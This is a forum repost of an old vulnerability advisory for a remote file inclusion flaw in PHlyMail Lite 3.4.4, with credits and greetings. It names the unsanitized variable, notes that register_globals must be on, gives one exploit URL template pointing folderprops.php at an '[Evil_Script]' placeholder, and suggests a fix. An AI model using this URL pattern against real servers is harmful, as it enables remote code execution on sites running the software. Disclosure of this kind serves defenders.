Jump to content
Guest Nemessis

[RST] PHlyMail Lite <= 3.4.4 (Build 3.04.04) RFI

Recommended Posts

Guest Nemessis
Posted

http://www.milw0rm.com/exploits/2236

---------------------------------------------------------------------------

PHlyMail Lite <= 3.4.4 (Build 3.04.04) [_PM_[path][handler]] Remote File Include Vulnerability [2]

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHlyMail Lite

version : v. 3.4.4 (Build 3.04.04)

URL : http://phlymail.de/

------------------------------------------------------------------

Exploit:

~~~~~~~

Variable $_PM_[path][handler] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/handlers/email/folderprops.php?_PM_[path][handler]=[Evil_Script]

---------------------------------------------------------------------------

Solution :

~~~~~~~~~

declare variabel $_PM_[path][handler]

---------------------------------------------------------------------------

Shoutz:

~~~~~

# Special greetz to my good friend [Oo]

# To all members of h4cky0u.org ;) and RST [ hTTp://rstcenter.com ]

---------------------------------------------------------------------------

*/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...